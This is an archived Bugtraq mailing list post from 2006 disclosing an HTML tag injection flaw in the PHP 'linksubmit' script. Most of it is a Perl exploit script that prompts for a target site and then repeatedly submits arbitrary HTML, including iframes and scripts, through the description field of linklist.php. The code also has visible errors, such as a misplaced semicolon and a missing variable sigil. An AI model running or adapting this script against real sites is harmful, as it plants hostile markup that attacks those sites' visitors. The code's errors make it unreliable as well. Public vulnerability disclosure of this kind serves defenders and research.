Home page logo
/

bugtraq logo Bugtraq mailing list archives

linksubmit <= All version Html Tag Injector in index.php
From: ali () hackerz ir
Date: 1 Apr 2006 20:06:58 -0000

Vendor : linksubmit 
Version : All Version 
www : http://www.phpselect.com 
AUTHOR : s3rv3r_hack3r
you can submit html tag's in $description  (linksubmit.php)

Exploit : 
#!/usr/bin/perl
#
# Exploit by s3rv3r_hack3r
# Special Thanx : hessamx , f0rk ,sattar.li , stanic, mfox,blood moon and..
######################################################
#  ___ ___                __                         #
# /   |   \_____    ____ |  | __ ___________________ #
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
# \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ #
#       \/      \/     \/     \/    \/            \/ #
#             Iran Hackerz Security Team             #
#               WebSite: www.hackerz.ir              #
######################################################
# Name    : linksubmit                               #
# Site    : http://www.phpselect.com/                #
######################################################
#you can use iframe,script and all html tags
#bug in linklist.php !!
#www.victim.com/linklist
use LWP::Simple;


print "-------------------------------------------\n";
print "=      Iran hacekerz security team        =\n";
print "=   By s3rv3r_hack3r  - www.hackerz.ir    =\n";
print "-------------------------------------------\n\n";


      print "Target >http://";;
      chomp($targ = <STDIN>);
      print "your web site name >";
      chomp($wwwname= <STDIN>);
      print "your web site url >";
      chomp($wsurl= <STDIN>);
      print "your email >";
      chomp($mail= <STDIN>);
   
   $con=get("http://".$targ."/linklist.php";) || die "[-]Cannot connect to Host"; 
while ()  
{  
     print "Html code\$";
     chomp($comd=<STDIN>);
     $commd=get("http://".$targ."/linklist.php?wsname=".$wwwname."&wsurl=".url."&email=".$mail."&description=".$comd)
}


  By Date           By Thread  

Current thread:
  • linksubmit <= All version Html Tag Injector in index.php ali (Apr 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault